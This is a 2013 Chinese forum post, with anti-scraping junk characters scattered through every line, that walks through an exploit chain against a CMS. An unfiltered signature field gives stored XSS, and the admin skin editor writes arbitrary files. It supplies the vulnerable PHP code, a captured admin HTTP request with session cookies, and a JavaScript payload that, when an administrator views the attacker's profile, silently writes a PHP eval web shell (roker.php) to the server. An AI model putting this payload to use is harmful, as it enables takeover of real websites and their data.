|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
. e, a, P. M$ ]: n2 M官网已经修补了,所以重新下了源码3 Z" z) L7 ~# n: D
因为 后台登入 还需要认证码 所以 注入就没看了。
; ?) y0 ^/ J$ d" p存在 xss
# \( h. ]! ~1 a- x( H8 g- [1 j7 f' b漏洞文件 user/member/skin_edit.php
( P0 E; n' f& o) v* F% X; T! V7 m本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:: ]; e' r Z l' z5 @! u; T$ r$ k
. W7 k9 q# f, A7 V: r2 k
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>( x! H S9 v& l- W f' i
- Q* H# P. c0 }% a- e# e</textarea></td></tr>8 j6 m9 a* Q! j! g1 @# c# o! A
% X! r: V& z; m! Q% H( v user/do.php
w4 ]% f# h3 @; Z: O5 U8 C) H+ T; P; n
3 X+ u# x0 P% a4 j5 i" K l
if($op=='zl'){ //资料
/ F' ^/ j/ o5 g, Y* p. H& }
~+ R' @. F; ^+ N- V if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) ( ~' N3 F2 v+ I1 G$ e
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
% x/ P$ n: K! u" }% R; `: q
( g. ^2 A+ D; K& e $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
1 x8 a9 P7 f1 Z 0 @9 _% M1 n3 P) K6 d Z4 t" P
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
7 p+ p, }; ^- S" }: h+ Q# K6 j( \ where CS_Name='".$cscms_name."'";. y: B' m/ q7 @1 h4 ]% I
8 c! k# a* h8 E
if($db->query($sql)){$ h* P/ H: ]# | y1 {
+ K/ r7 {$ {/ `5 @' y# X* I
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
8 E# ?6 s- X; F8 A0 d, b4 b2 x; @+ T& Q
* S& v; S7 k' u }else{# x" T- l5 g( i* ]- r
$ `8 r/ `% ~% S8 n$ B& P# `
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
' W/ u, ?3 [6 j% r
( Q. S! k# H+ [; x' Q# Z }) I3 X2 K1 h7 |- G- t
2 s0 @9 k' q3 L
5 A8 K7 G( [$ h9 i4 C7 T没有 过滤导致xss产生。+ L5 |$ a' ?3 z1 Z
后台 看了下 很奇葩的是可以写任意格式文件。。3 Y( o# Q+ {0 @; S$ p
抓包。。8 r$ e/ h. T J( g: l9 z
$ S) T# [1 R; g1 ~& y I% c, h! J
/ H5 z" l; l' z7 A7 r6 w) O本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1" z5 F; s% s4 w4 e3 W. H% b. R
3 n2 _+ h4 e3 ~# a
Accept: text/html, application/xhtml+xml, */*3 l' [2 f( A/ i5 \1 f
$ @& j7 e$ S; X h0 R; EReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
, M$ v0 m8 d1 g { 2 h! F6 X. y. o. s" }. w/ j/ Q
Accept-Language: zh-CN
' N. o9 P9 i' Q" J 8 m3 E2 g* G, t6 c
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)( M7 P2 c* o6 k" e+ p+ p
1 U, U5 L0 e* _8 }( y, a* J/ E
Content-Type: application/x-www-form-urlencoded( A f% i$ t0 ^7 R* ?& b+ g
% p( h5 h2 r, f' fAccept-Encoding: gzip, deflate% U2 V% p" I% d1 D! i
$ R' ~: y" `1 ZHost: 127.0.0.1
0 t' l% u* @& f& T7 r8 Y4 S
7 n2 H# |0 r3 P, y+ M- }Content-Length: 38
: |+ `, M" K. w1 m4 l6 H
6 C& G" f7 E# [' JDNT: 1
' H2 k! M) k& `5 C. d& A
- K2 o3 b1 Z) V* \5 Z2 E: lConnection: Keep-Alive
' ~% i2 ^0 u' M4 `% o
8 q: y2 c6 r8 z7 O9 FCache-Control: no-cache- O7 [# F7 M% A7 v" q3 Q* L$ e/ s
$ d- P& n# m( g
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
( J/ d' v. i+ u' a4 I ( j4 y8 b9 B) i8 V* u+ o
6 D$ f0 W( @- w8 p5 T# W. mname=aaa.php&content=%3Cs%3E%3Ca%25%3E$ Y" k8 N( C( S I1 F
, n/ n) k" |2 [1 w' V; b3 Z
* E" ]9 g8 f8 {2 t* O7 x! x
. K; u6 i S5 n& {
于是 构造js如下。
! l7 I4 \: r/ g% d% V- K6 X3 n* k
. q. A. H# B$ C+ _% h, K本帖隐藏的内容<script>
+ s. d! }, }8 mthisTHost = top.location.hostname;& \( `& B9 N, H; X2 m) W) p/ T
# {& ]6 g( I# p8 e3 bthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
1 }4 B+ Y# W; Q& I; C% n3 t' u ; A$ b P8 h6 \
function PostSubmit(url, data, msg) {
; n7 `% `* |' Y- } var postUrl = url;! h( a' m3 Z; @" j; L' t
) f( z3 O* q& j
var postData = data;
% R x$ q5 o0 p K* G' l var msgData = msg;
# [5 `! n# B& A p; M var ExportForm = document.createElement("FORM");
. z3 E$ C! ]* Y* k! n document.body.appendChild(ExportForm); & {1 ]4 y9 A7 o6 H0 Y/ r
ExportForm.method = "POST"; , |( v- u' H! l4 ]
var newElement = document.createElement("input");
$ n) i U! V( X+ D; p& z! \8 B) G7 S newElement.setAttribute("name", "name");
7 t6 {' i6 L# c5 m) w newElement.setAttribute("type", "hidden");
: i, `; z5 s; z" V var newElement2 = document.createElement("input");
9 K/ n Y/ K7 r newElement2.setAttribute("name", "content");
$ G5 r# q* m0 E2 j newElement2.setAttribute("type", "hidden");
- c0 D" A4 A% |, S2 q ExportForm.appendChild(newElement);
' H# t2 {6 R; S r1 J ExportForm.appendChild(newElement2); 2 n- n- P$ O+ @9 g
newElement.value = postData;
) G$ w) t" E1 l# U- B newElement2.value = msgData;
' K# G8 _3 h. p1 _5 E+ ]" \ ExportForm.action = postUrl; 3 p4 d; I k& I5 _- Q
ExportForm.submit(); ( T- T9 L" E: V
};2 N' @( Q# H1 j1 o6 b
" F; y0 X$ e3 t# i9 lPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
4 e, p1 a4 }8 j( a$ K/ K. C5 F% F* S ! V+ u: Y+ {% L' x' ^: L
</script>
' h6 E5 [0 h2 {! E8 k6 g" q
8 x& p1 \ i6 ?6 J0 n
' i( X* {! `0 m, X! m" h$ a6 G3 ]$ F8 ]0 |, `7 E
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入( f+ A3 f- T- \' b9 ?
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
: [' U' h$ \& w; E- u/ Y就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
- k: W8 P3 M d5 C7 N* U/ K
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对